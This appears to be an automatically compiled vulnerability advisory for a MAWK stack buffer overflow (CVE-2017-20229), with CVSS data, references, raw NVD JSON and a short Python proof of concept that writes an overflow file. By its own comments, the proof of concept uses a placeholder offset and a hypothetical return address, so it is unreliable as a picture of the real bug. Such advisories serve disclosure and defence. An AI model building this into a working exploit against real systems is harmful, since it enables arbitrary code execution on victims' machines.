Security Vulnerability Report
CVE-2017-20229 CVSS 9.8 CRITICAL

Published: 2026-03-28 12:16:02
Last Modified: 2026-04-02 19:19:07

Description

MAWK 1.3.3-17 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting inadequate boundary checks on user-supplied input. Attackers can craft malicious input that overflows the stack buffer and execute a return-oriented programming chain to spawn a shell with application privileges.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:invisible-island:mawk:*:*:*:*:*:*:*:* - VULNERABLE
MAWK <= 1.3.3-17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys
import os

# PoC for CVE-2017-20229 (MAWK Stack Buffer Overflow)
# This script generates a malicious input to trigger the crash.

def generate_poc():
    # Offset to overwrite the instruction pointer (Example value)
    offset = 1024

    # Filling the buffer with 'A's to cause overflow
    # In a real exploit scenario, this would contain ROP gadgets and shellcode
    junk = b"A" * offset

    # Hypothetical return address to control EIP/RIP
    # This address varies based on the OS and binary version
    ret_addr = b"\xaf\x11\x40\x00"

    payload = junk + ret_addr

    print("[*] Generating malicious input file 'exploit.txt'...")
    try:
        with open("exploit.txt", "wb") as f:
            f.write(payload)
        print("[+] File created successfully.")
        print("[*] Usage: ./mawk -f exploit.txt")
    except IOError as e:
        print(f"[-] Error creating file: {e}")

if __name__ == "__main__":
    generate_poc()

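References

https://www.exploit-db.com/exploits/42357 (Exploit, VDB Entry)
https://www.vulncheck.com/advisories/mawk-17-stack-based-buffer-overflow (Third Party Advisory)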

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20229", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:02.400", "lastModified": "2026-04-02T19:19:06.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MAWK 1.3.3-17 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting inadequate boundary checks on user-supplied input. Attackers can craft malicious input that overflows the stack buffer and execute a return-oriented programming chain to spawn a shell with application privileges."}, {"lang": "es", "value": "MAWK 1.3.3-17 y versiones anteriores contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a los atacantes ejecutar código arbitrario al explotar comprobaciones de límites inadecuadas en la entrada proporcionada por el usuario. Los atacantes pueden crear una entrada maliciosa que desborda el búfer de pila y ejecutar una cadena de programación orientada a retorno para generar un shell con privilegios de aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": 
"NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invisible-island:mawk:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.3-17", "matchCriteriaId": "D2CD043D-B1AA-4C92-BFD0-00D461AB42A4"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/42357", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/mawk-17-stack-based-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}